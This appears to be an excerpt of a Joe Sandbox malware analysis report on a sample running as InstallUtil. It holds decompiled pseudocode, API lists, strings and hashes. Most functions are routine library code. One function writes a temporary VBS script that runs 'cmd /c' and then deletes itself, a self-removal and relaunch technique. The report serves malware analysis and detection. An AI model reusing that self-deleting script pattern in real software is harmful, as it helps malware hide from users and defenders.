				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E004516AF(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E0044C066(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0045161A();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0044BFAF(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46d800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E004513CD(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46d800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0045161A();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46d800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0043990B(GetLastError());
											 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0044C178( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0045182B(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E00446C18(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0043990B(_t270);
							 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E00439941())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46d800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0043990B(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0045161A();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043992E()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E00439941())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043992E()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E00439941()));
				}
			}

0x0045196f
0x00451973
0x00451974
0x00451974
0x00451974
0x00451976
0x0045197c
0x00451997
0x0045199c
0x0045199f
0x004519a1
0x004519a3
0x004519c2
0x004519c9
0x004519d0
0x004519d3
0x004519df
0x004519e2
0x004519ea
0x004519eb
0x004519ee
0x004519ee
0x004519f5
0x004519f7
0x004519fa
0x00451a02
0x00451a05
0x00451a72
0x00451a73
0x00451a79
0x00451a7b
0x00451ac4
0x00451ac7
0x00451ad0
0x00451ad3
0x00451ad6
0x00451ad8
0x00451ad8
0x00451ad8
0x00451ac9
0x00451acc
0x00451acc
0x00451add
0x00451ae0
0x00451aec
0x00451af1
0x00451afd
0x00451b07
0x00451b0b
0x00451b15
0x00451b18
0x00451b23
0x00451b28
0x00451b38
0x00451b3b
0x00451b3f
0x00451b40
0x00451b46
0x00451b4b
0x00451b4e
0x00451b50
0x00451b52
0x00451b57
0x00451b5a
0x00451b5c
0x00451b86
0x00451baa
0x00451bae
0x00451bb2
0x00451bb4
0x00451bb8
0x00451bba
0x00451bc4
0x00451bc7
0x00451bce
0x00451bce
0x00451bce
0x00451bce
0x00451bb8
0x00451bd3
0x00451bdf
0x00451be1
0x00451c6c
0x00451c6c
0x00000000
0x00451be7
0x00451be7
0x00451beb
0x00000000
0x00000000
0x00451bf0
0x00451c02
0x00451c0a
0x00451c0d
0x00451c0e
0x00451c11
0x00451c18
0x00451c1d
0x00451c20
0x00451c54
0x00451c5e
0x00451c5e
0x00451c68
0x00000000
0x00451c68
0x00451c29
0x00451c42
0x00451c49
0x00451a6c
0x00000000
0x00451a6c
0x00451be1
0x00451b5e
0x00000000
0x00451b2a
0x00451b31
0x00451b34
0x00451b36
0x00451b60
0x00451b62
0x00000000
0x00451b68
0x00000000
0x00451b36
0x00451b28
0x00451a83
0x00451a86
0x00451aa1
0x00451aa6
0x00451aac
0x00451aae
0x00451ab9
0x00451ab9
0x00000000
0x00451aae
0x00451a07
0x00451a0e
0x00451a10
0x00451a47
0x00451a47
0x00451a51
0x00451a54
0x00451a5b
0x00451a5b
0x00451a5b
0x00451a67
0x00000000
0x00451a67
0x00451a12
0x00451a16
0x00000000
0x00000000
0x00451a18
0x00451a27
0x00451a2c
0x00451a2f
0x00451a30
0x00451a33
0x00451a33
0x00451a3a
0x00451a3c
0x00451a3f
0x00451a42
0x00451a45
0x00000000
0x00000000
0x00000000
0x004519a5
0x004519aa
0x004519ad
0x004519b4
0x00000000
0x004519b4
0x0045197e
0x00451983
0x00451989
0x0045198b
0x00000000
0x00451990

APIs

Part of subcall function 0045161A: CreateFileW.KERNEL32(00000000,00000000,?,004519F5,?,?,00000000,?,004519F5,00000000,0000000C), ref: 00451637

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00451A60
__dosmaperr.LIBCMT ref: 00451A67
GetFileType.KERNEL32(00000000), ref: 00451A73
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00451A7D
__dosmaperr.LIBCMT ref: 00451A86
CloseHandle.KERNEL32(00000000), ref: 00451AA6
CloseHandle.KERNEL32(00000000), ref: 00451BF0
GetLastError.KERNEL32 ref: 00451C22
__dosmaperr.LIBCMT ref: 00451C29

Strings

H, xrefs: 00451BAE

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 5e1f6f77a6c07bd48e4a6e7957e7f351ec4a9a56cc103863395e372cee4a87c4
Instruction ID: 50b0640321c17c93fe2f0ffb3127ba91cff55095811ef4f5a979557d6023e441
Opcode Fuzzy Hash: 5e1f6f77a6c07bd48e4a6e7957e7f351ec4a9a56cc103863395e372cee4a87c4
Instruction Fuzzy Hash: 56A13732A141089FDF19AF68C8917AE7BA0DB06325F18015EFC11DF3A2D7798D16CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00412189 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00412189(char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
				intOrPtr _v0;
				short _v4;
				char _v8;
				char* _v12;
				signed short _v20;
				intOrPtr _v24;
				char _t36;
				short _t37;
				intOrPtr* _t44;
				void* _t47;
				void* _t49;
				char* _t52;
				signed short* _t58;
				signed char _t63;
				intOrPtr _t64;
				signed short _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t77 =  &_v12;
				_t36 =  *((intOrPtr*)("65535")); // 0x33353536
				_v8 = _t36;
				_t37 =  *0x4671e8; // 0x35
				_t74 = _a4;
				_v4 = _t37;
				_v12 =  &_v8;
				if(_t74 == 0 || _a8 < 0x10) {
					L42:
					return 0x2afb;
				} else {
					_t71 = 2;
					if( *_t74 != _t71) {
						return 0x273f;
					}
					_t76 = _a24;
					_t64 = _a20;
					_t73 = _a16;
					if(_a12 == 0 || _t73 == 0) {
						if(_t64 == 0 || _t76 == 0) {
							return 0x2af9;
						} else {
							goto L8;
						}
					} else {
						L8:
						_t63 = _a28;
						_t42 = _t63 & 0x00000006;
						if((_t63 & 0x00000006) != 6) {
							if(_t64 == 0 || _t76 == 0) {
								L21:
								if(_a12 == 0 || _t73 == 0) {
									L40:
									return 0;
								} else {
									_t44 =  *((intOrPtr*)(_t74 + 4));
									_a4 = _t44;
									if((_t63 & 0x00000002) == 0) {
										_t44 =  &_a4;
										__imp__#51(_t44, 4, _t71);
										if(_t44 == 0) {
											L30:
											if((_t63 & 0x00000004) == 0) {
												_push(_v8);
												L37:
												__imp__#12();
												_t75 = _t44;
												L38:
												if(_t73 <= E004372D0(_t75)) {
													goto L42;
												}
												E0043DAD7(_v4, _t73, _t75);
												goto L40;
											}
											__imp__#111();
											_t47 = _t44 - 0x2af9;
											if(_t47 == 0) {
												L34:
												return 0x2af9;
											}
											_t49 = _t47 - 1;
											if(_t49 == 0) {
												return 0x2afa;
											}
											if(_t49 == 1) {
												goto L42;
											}
											goto L34;
										}
										_t75 =  *_t44;
										if( *_t44 == 0) {
											goto L30;
										}
										if((_t63 & 0x00000001) != 0) {
											_t52 = L00411B21(_t75, 0x2e);
											if(_t52 != 0) {
												 *_t52 = 0;
											}
										}
										goto L38;
									}
									_push(_t44);
									goto L37;
								}
							} else {
								_t69 =  *(_t74 + 2) & 0x0000ffff;
								_a8 = _t69;
								if((_t63 & 0x00000008) == 0) {
									_t72 = 0;
									_t54 =  ==  ? _t72 : "udp";
									_t42 = _t69 & 0x0000ffff;
									__imp__#56(_t42,  ==  ? _t72 : "udp");
									if(_t42 == 0) {
										L17:
										_push(_v0);
										L18:
										__imp__#15();
										E00411BAC( &_v20, 6, "%u", _t42 & 0x0000ffff);
										_t58 =  &_v20;
										_t77 = _t77 + 0x10;
										L19:
										if(_t76 <= E004372D0(_t58)) {
											goto L42;
										}
										E0043DAD7(_a8, _t76, _v24);
										_t77 = _t77 + 0xc;
										_t71 = 2;
										goto L21;
									}
									_t42 =  *_t42;
									if(_t42 == 0) {
										goto L17;
									}
									_v20 = _t42;
									goto L19;
								}
								_push(_t69);
								goto L18;
							}
						}
						return 0x2726;
					}
				}
			}

0x00412189
0x0041218c
0x00412192
0x00412196
0x0041219e
0x004121a2
0x004121ab
0x004121b2
0x00412350
0x00000000
0x004121c3
0x004121c5
0x004121c9
0x00000000
0x004121cb
0x004121da
0x004121de
0x004121e2
0x004121e6
0x004121ee
0x00000000
0x00000000
0x00000000
0x00000000
0x004121fc
0x004121fc
0x004121fc
0x00412202
0x00412207
0x00412215
0x004122a5
0x004122aa
0x00412345
0x00000000
0x004122b8
0x004122b8
0x004122bb
0x004122c2
0x004122ca
0x004122cf
0x004122d7
0x004122f7
0x004122fa
0x00412320
0x00412324
0x00412324
0x0041232a
0x0041232c
0x00412335
0x00000000
0x00000000
0x0041233d
0x00000000
0x00412342
0x004122fc
0x00412307
0x00412309
0x00412315
0x00000000
0x00412315
0x0041230b
0x0041230e
0x00000000
0x00412319
0x00412313
0x00000000
0x00000000
0x00000000
0x00412313
0x004122d9
0x004122dd
0x00000000
0x00000000
0x004122e2
0x004122e7
0x004122f0
0x004122f2
0x004122f2
0x004122f0
0x00000000
0x004122e2
0x004122c4
0x00000000
0x004122c4
0x00412223
0x00412223
0x00412227
0x0041222e
0x00412235
0x0041223e
0x00412242
0x00412246
0x0041224e
0x0041225c
0x0041225c
0x00412260
0x00412260
0x00412276
0x0041227b
0x0041227f
0x00412282
0x0041228b
0x00000000
0x00000000
0x0041229a
0x0041229f
0x004122a4
0x00000000
0x004122a4
0x00412250
0x00412254
0x00000000
0x00000000
0x00412256
0x00000000
0x00412256
0x00412230
0x00000000
0x00412230
0x00412215
0x00000000
0x00412209
0x004121e6

Strings

udp, xrefs: 00412239, 00412241, 00412245
65535, xrefs: 0041218C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 31821f55b8d9277e01db58fcdc86719a36b7115fc0a81b7230a33fe71a4743ca
Instruction ID: ae91068980d7d96a9e8edf194e4aba947a5305d5091cc1e6aca1b6646d697b82
Opcode Fuzzy Hash: 31821f55b8d9277e01db58fcdc86719a36b7115fc0a81b7230a33fe71a4743ca
Instruction Fuzzy Hash: B85114316083069BD3248A64EA05BAB77A4AF89704F08042FFC65D6391E7FCD9E1971E

Uniqueness

Uniqueness Score: -1.00%

Function 00451C75 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00452D6F), ref: 00451C98

Strings

log10, xrefs: 00451CE2, 00451D32
<@, xrefs: 00451D0E, 00451DA8, 00451E60
pow, xrefs: 00451D7C, 00451E28, 00451E3B
sqrt, xrefs: 00451E1C
exp, xrefs: 00451D5D, 00451DBF
o-E, xrefs: 00451E7D
asin, xrefs: 00451E04
log, xrefs: 00451D3E, 00451D4A
acos, xrefs: 00451E10

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: <@$acos$asin$exp$log$log10$o-E$pow$sqrt
API String ID: 3527080286-1913709634
Opcode ID: ce6f11cd7ac8e5f6465fbe9480caa101cbffab63acf0c775b6aef6915568fb52
Instruction ID: 4d42ff924c0f6c0d5069b56fe5caa6540bd7368ddd0efee2bde0047ccff7ba1b
Opcode Fuzzy Hash: ce6f11cd7ac8e5f6465fbe9480caa101cbffab63acf0c775b6aef6915568fb52
Instruction Fuzzy Hash: 5D517E70900509CBCF109F98E9486ADBBB4FB49306F504197DC81AA276C77A9D2CC71D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B630 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B630(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;
				void* _t137;

				_t79 = __ebx;
				E0041030A();
				_t36 = E0040243C();
				_t37 = E00401F6B(0x46e5e8);
				_t40 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v716, 0x208, _t37, _t36);
				_t141 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00402FD4(_t79,  &_v124, E00418385( &_v52, E00418114( &_v76)), 0, _t137, _t141, L".vbs");
				E00401EC9();
				E00401F98();
				E004042DD(_t79,  &_v100, E00402FD4(_t79,  &_v76, E0040413E(_t79,  &_v52, _t42, _t137, E00438A0F(_t79,  &_v76, _t141, L"Temp")), 0, _t137, _t141, "\\"), _t137, _t141,  &_v124);
				E00401EC9();
				E00401EC9();
				E00401F46(_t79,  &_v28);
				_t54 = E0040413E(_t79,  &_v196, _t49, _t137, L"\"\"\", 0");
				E0040321D(E00402FD4(_t79,  &_v76, E00402F65( &_v52, E00402FD4(_t79,  &_v148, E0040413E(_t79,  &_v172, _t49, _t137, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t137, _t141,  &_v716), _t54), 0, _t137, _t141, "\n"));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				L00407735(_t79,  &_v28, 0, _t137, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = E00401EC4( &_v100);
				_t68 = E0040243C();
				E00401EC4( &_v28);
				if(E00418911(_t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EC4( &_v100), 0x4610ec, 0x4610ec, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EC9();
				E00401EC9();
				return E00401EC9();
			}

0x0040b630
0x0040b63b
0x0040b647
0x0040b64f
0x0040b673
0x0040b67d
0x0040b67f
0x0040b68a
0x0040b68a
0x0040b6ac
0x0040b6b5
0x0040b6bd
0x0040b6ef
0x0040b6f8
0x0040b700
0x0040b708
0x0040b71d
0x0040b762
0x0040b76a
0x0040b772
0x0040b77d
0x0040b788
0x0040b793
0x0040b7a0
0x0040b7a9
0x0040b7b2
0x0040b7be
0x0040b7d0
0x0040b7f5
0x0040b7f5
0x0040b7fe
0x0040b806
0x0040b818

APIs

Part of subcall function 0041030A: TerminateProcess.KERNEL32(00000000,0046E588,0040D393), ref: 0041031A
Part of subcall function 0041030A: WaitForSingleObject.KERNEL32(000000FF), ref: 0041032D

Part of subcall function 00410C6B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046E5A0), ref: 00410C87
Part of subcall function 00410C6B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410CA0
Part of subcall function 00410C6B: RegCloseKey.ADVAPI32(00000000), ref: 00410CAB

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B68A
ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040B7E9
ExitProcess.KERNEL32 ref: 0040B7F5

Strings

.vbs, xrefs: 0040B690
Temp, xrefs: 0040B6CB
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040B798
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B72A
open, xrefs: 0040B7E3
""", 0, xrefs: 0040B712
exepath, xrefs: 0040B662

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 8bd3bb04db83121c22f445a1564e59127c72aec3aaa4961ef53ac7f3946c6543
Instruction ID: f8e7d5a33d4c2048acc725ad2923984ed36cecf8b18b684af341db1542bedc50
Opcode Fuzzy Hash: 8bd3bb04db83121c22f445a1564e59127c72aec3aaa4961ef53ac7f3946c6543
Instruction Fuzzy Hash: 6E415E329101185ACB04F762DC96DEE7379AF50708F50017FF406B71E2EE381E8ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 0043717A Relevance: 16.6, APIs: 11, Instructions: 116
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043717A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E004370F7(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E00439941())) = 0x16;
					E0043862C();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E004421F7(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E004421F7(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00443A20(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E0043990B(GetLastError());
										}
									}
								}
								E004427C2(_t67);
							} else {
								E0043990B(GetLastError());
							}
						}
						E004427C2(_t64);
					} else {
						E0043990B(GetLastError());
					}
					goto L18;
				}
			}

0x0043717a
0x0043718a
0x00437192
0x00437194
0x00437197
0x0043719a
0x0043719f
0x004371b4
0x004371b9
0x004371bf
0x00437291
0x00437295
0x0043729a
0x0043729a
0x004372a8
0x004372a8
0x004371a1
0x004371a6
0x00000000
0x00000000
0x004371a8
0x004371ad
0x00000000
0x004371c9
0x004371d2
0x004371d8
0x004371dd
0x004371fa
0x004371fc
0x004371ff
0x0043721a
0x00437233
0x00437238
0x00437248
0x00437250
0x00437255
0x0043726e
0x0043727f
0x00437270
0x00437277
0x0043727c
0x0043726e
0x00437255
0x00437283
0x0043721c
0x00437223
0x00437223
0x00437288
0x0043728a
0x004371df
0x004371e6
0x004371eb
0x00000000
0x004371dd

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004371D2
GetLastError.KERNEL32(?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004371DF
__dosmaperr.LIBCMT ref: 004371E6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00437212
GetLastError.KERNEL32(?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043721C
__dosmaperr.LIBCMT ref: 00437223
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D15,?), ref: 00437266
GetLastError.KERNEL32(?,?,?,?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00437270
__dosmaperr.LIBCMT ref: 00437277
_free.LIBCMT ref: 00437283
_free.LIBCMT ref: 0043728A

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 23444667afc1a1e6baa4739f47f4e0ea3ebaed748cf7b77ebe9eb0028f7abf96
Instruction ID: 08740670cb7e6ff56e8558ad400acf98d04cadd4c0b89948628c33e964d09179
Opcode Fuzzy Hash: 23444667afc1a1e6baa4739f47f4e0ea3ebaed748cf7b77ebe9eb0028f7abf96
Instruction Fuzzy Hash: 8531F5B240820ABFDF21AFA6CC449AF3B78EF09368F10429AF85056351DB39CD51DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CE00(short* __edx) {
				char _v52;
				intOrPtr _v56;
				char _v60;
				short _v64;
				short* _v68;
				signed int _v72;
				void* _t40;
				void* _t43;
				void* _t46;
				void* _t56;
				intOrPtr _t59;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				void* _t65;
				char* _t66;
				signed int _t67;
				signed int _t69;
				intOrPtr _t73;
				void* _t77;
				short* _t79;
				intOrPtr* _t80;
				char* _t81;
				void* _t82;
				void* _t83;
				signed int* _t86;
				signed int* _t87;

				_v68 = __edx;
				_v72 = _v72 & 0;
				_t83 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = E0040BC3F();
				_t81 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L33:
					return 0;
				}
				_t40 = E004386A0(_t81, "ALL", 3);
				_t86 =  &(( &_v72)[3]);
				if(_t40 == 0) {
					L32:
					return 1;
				}
				_t43 = E004386A0(_t81, "DEFAULT", 7);
				_t87 =  &(_t86[3]);
				if(_t43 == 0) {
					goto L32;
				} else {
					goto L3;
				}
				do {
					L3:
					_t66 = _t81;
					_t82 = E00435320(_t81, 0x46722c);
					_pop(_t69);
					if(_t82 != 0) {
						_t46 = _t82 - _t66;
					} else {
						_t46 = E004372D0(_t66);
						_pop(_t69);
					}
					if(_t46 <= 0x31) {
						if(_t82 != 0) {
							_t77 = _t82 - _t66;
						} else {
							_t65 = E004372D0(_t66);
